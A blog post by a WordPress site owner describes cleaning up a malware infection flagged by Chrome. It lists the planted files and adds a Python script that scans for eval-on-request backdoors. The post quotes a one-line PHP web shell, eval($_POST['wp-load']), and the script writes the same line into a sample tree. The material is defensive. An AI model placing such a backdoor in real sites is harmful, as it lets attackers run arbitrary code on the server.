I received this warning in Google Chrome last night when I tried to open my website jogindernagar.com, built in WordPress.
Warning: Something's Not Right Here!
www.jogindernagar.com contains malware. Your computer might catch a virus if you visit this site.
I immediately tried some anti-virus and security plugins and found a reference to some unfamiliar files on my server. (I still wonder how these files were placed on my server.) The scan results showed a reference to an unfamiliar file named wp-includes/wp-var.php. The PHP file ran an eval() script as shown below:
<?php if (isset($_POST['wp-load'])) { eval($_POST['wp-load']); }; ?>
I visited Google Webmaster Tool for more information and found 4 references to URLs with malware. Here’s one:
http://www.jogindernagar.com/wp-count.php?ref=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dhistory%252Bdistrict%252Bjogindernagar%252Bhimachal%252Bpradesh%26source%3Dweb%26cd%3D4%26ved%3D0CCQQFjAA%26url%3Dhttp%253A%252F%252Fwww.jogindernagar.com%252Ffeatured%252F%26ei%3Dp49QUPDJB-LX2wSktAE%26usg%3DAFQjCNFucH2b1qTgMGKeK0oO0PD8DF_nAA
Obviously, wp-count.php was another PHP file created to support the malware. I did another manual comparison of the WordPress files and found more non-WordPress files with eval() and unfriendly PHP code in them.
I thought this information might be helpful for someone trying to remove similar malware infections and code injection breaches.
Complete list of malware files found on my server:
wp-includes/wp-var.php
wp-count.php
wp-apps.php
wp-register.php
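The manual comparison described above can be scripted. The following is an added example, not code from the original post: audit() and build_sample_site() are hypothetical names, the sample tree is constructed, and the known-good list is assumed to come from a clean WordPress download of the same version.

```python
import re
import tempfile
from pathlib import Path

# eval() fed directly from request data, the pattern seen in wp-var.php above.
EVAL_ON_INPUT = re.compile(
    rb"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE)


def audit(root, known_good):
    """Return {relative_path: reason} for PHP files that need manual review.

    known_good: relative paths taken from a pristine copy of the same
    WordPress version (assumption: the caller supplies this list).
    """
    findings = {}
    root = Path(root)
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        if EVAL_ON_INPUT.search(path.read_bytes()):
            findings[rel] = "eval() on request input"
        # wp-content holds themes and plugins, which are never in the core
        # list, so only the eval check applies there.
        elif rel not in known_good and not rel.startswith("wp-content/"):
            findings[rel] = "not in clean core file list"
    return findings


def build_sample_site(root):
    """Constructed sample tree: two core stand-ins plus two planted files."""
    files = {
        "wp-load.php": "<?php // constructed stand-in for a core file\n",
        "wp-includes/version.php": "<?php // constructed stand-in\n",
        "wp-includes/wp-var.php":
            "<?php if (isset($_POST['wp-load'])) { eval($_POST['wp-load']); }; ?>",
        "wp-count.php": "<?php // constructed: unknown file without eval\n",
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return {"wp-load.php", "wp-includes/version.php"}


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return audit(tmp, build_sample_site(tmp))


if __name__ == "__main__":
    for rel, reason in demo().items():
        print(f"{rel}: {reason}")
```

A file flagged only as "not in clean core file list" still needs to be opened and read, since a backdoor does not have to call eval() directly on request data.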
Some helpful Security, Antivirus and Scanning plugins for WordPress:
Wordfence Security (it fixed all my issues)
Better WP Security
WP Security Scan
AntiVirus
I am submitting a review request to Google right now. Let’s hope everything is fine now.